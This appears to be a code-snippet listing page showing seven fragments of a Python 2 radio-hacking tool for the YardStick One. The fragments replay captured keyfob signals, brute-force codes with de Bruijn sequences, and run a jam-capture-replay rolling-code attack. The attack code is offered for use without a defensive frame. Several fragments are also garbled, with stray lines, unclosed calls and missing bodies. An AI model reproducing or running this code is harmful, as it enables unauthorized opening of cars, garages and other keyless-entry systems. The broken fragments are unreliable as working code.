Exemple #1
def replaySavedCapture(d, uploaded_payload):
    '''Used to import an old capture and replay it from a file'''
    with open(uploaded_payload) as f:
        payloads = f.readlines()
        print payloads
        payloads = tools.createBytesFromPayloads(payloads)

        response = raw_input("Send once, or forever? (o/f) Default = o ")

        if response.lower() == "f":
                "\nNOTE: TO STOP YOU NEED TO CTRL-Z and Unplug/Plug IN YARDSTICK-ONE\n"
            while True:
                for payload in payloads:
                    print "WAITING TO SEND"
                        1)  #You may not want this if you need rapid fire tx
                    tools.sendTransmission(payload, d)

            for payload in payloads:
                print "WAITING TO SEND"
                tools.sendTransmission(payload, d)
Exemple #2
def deBruijn(d):
    '''Send Binary deBruijn payload to bruteforce a signal'''
    response = raw_input("What length deBruijn would you like to try: ")

    binary = utilities.deBruijn(2, int(response))
    payload = tools.turnToBytes(binary)
    print('Sending ' + str(len(binary)) +
          ' bits length binary deBruijn payload formated to bytes')

    tools.sendTransmission(payload, d)
Exemple #3
    def liveClicks(self):
        '''Compare Signals and Create graphs to compare a live capture with a keyfob press'''
        count = 0
        live = True
        graphToPercent = {} #Holds % match and payload for each signal in a click

        #Get binary output of the payload
        captured_payload_binary  = self.payloadsToBinary(self.captured_payload)
        print "----------Start Signals In Press--------------"
        for presses in self.keyfob_payloads:
            for keyfob_payload in presses:
                #Get binary output of the keyfob captures
                keyfob_programming_binary = self.payloadsToBinary(keyfob_payload)

                #Handle Calculations for likilihood
                one = ''.join(str(x) for x in captured_payload_binary)
                two =''.join(str(x) for x in keyfob_programming_binary)

                percent = tools.similar(one,two)
                graphToPercent[keyfob_payload] = percent

                print "Percent Chance of Match for press is: %.2f" % percent
        print "----------End Signals In Press------------"
        #Send dictionaries of percents and return the signal with the highest % comparison
        keyfob_payload = self.getHighestPercent(graphToPercent)
        keyfob_programming_binary = self.payloadsToBinary(keyfob_payload)

        self.createGraph(captured_payload_binary, keyfob_programming_binary)
        self.outputImagesComparisons(1, live)

        print "For Visual of the last signal comparison go to ./imageOutput/LiveComparison.png"
Exemple #4
    def createImageGraph(self):
        '''Create a graph to compare a list of captures with the keyfob press'''
        count = 0
        likilihoods = []
        #Get binary output of the payload
        captured_payload_binary = self.payloadsToBinary(self.captured_payload)

        for presses in self.keyfob_payloads:
            for keyfob_payload in presses:
                #Get binary output of the keyfob captures
                keyfob_programming_binary = self.payloadsToBinary(

                #Handle Calculations for likilihood
                one = ''.join(str(x) for x in captured_payload_binary)
                two = ''.join(str(x) for x in keyfob_programming_binary)

                percent = tools.similar(one, two)
                print "Percent Chance of Match for press is: %.2f" % percent

                count = count + 1
Exemple #5
def replayLiveCapture(d, rolling_code, upper_rssi, lower_rssi):
    '''Replays a live capture real time, lets you select your capture
    and replay it or save it for later'''

    replay_capture, signal_strength = tools.capturePayload(d,rolling_code, upper_rssi, lower_rssi)
    replay_capture = [replay_capture]

    response = raw_input( "Replay this capture? (y/n) ")
    if response.lower() == 'y':
        payloads = tools.createBytesFromPayloads(replay_capture)
        for payload in payloads:
            print "WAITING TO SEND"
            tools.sendTransmission(payload ,d)

    response = raw_input( "Save this capture for later? (y/n) ")
    if response.lower() == 'y':
        mytime = time.strftime('%X')
        with open("./files/"+mytime+"_payload.cap", 'w') as file:
        print "Saved file as: ./files/"+mytime+"_payload.cap"
Exemple #6
def rollingCode(d, frequency, jamming_variance, baud_rate_jammer, rolling_code, upper_rssi, lower_rssi):
    '''Sets up for a rolling code attack, requires a frequency
    and a RFCat Object'''

    print("ROLLING CODE REQUIRES 2 YardSticks Plugged In")
    j = jam.setupJammer(1, baud_rate_jammer)

    jam.jamming(j, "start", frequency+jamming_variance, rolling_code)
    roll_captures, signal_strength = tools.capturePayload(d, rolling_code, upper_rssi, lower_rssi)
    print("Waiting to capture your rolling code transmission")
    print signal_strength
    print roll_captures

    payloads = tools.createBytesFromPayloads(roll_captures)

    jam.jamming(j, "stop",frequency+jamming_variance, rolling_code)

    print "Sending First Payload "
    tools.sendTransmission(payloads[0] ,d)
    response = raw_input( "Ready to send second Payload?? (y/n) ")
    if response.lower() == "y":
        tools.sendTransmission(payloads[1] ,d)

        response = raw_input( "Choose a name to save your file as and press enter: ")
        with open("./files/"+response+".cap", 'w') as file:
        print "Saved file as: ./files/"+response+".cap  You can manually replay this later with -s -u"
Exemple #7
def logTail(my_clicker):
    ''' This function acts as a linux tail function but only pulling new additions to a file since running
    it parses for payload lines which is uses in analysis and graphing'''
    capture_log = "./captures/capturedClicks.log"
    file = open(capture_log, 'r')

    #Find the size of the file and move to the end
    st_results = os.stat(capture_log)
    st_size = st_results[6]

    while 1:
        where = file.tell()
        line = file.readline()
        if not line:
            if "found" not in line:
                presses = tools.parseSignalsLive(line)
                my_clicker.keyfob_payloads = presses
                percent = my_clicker.liveClicks()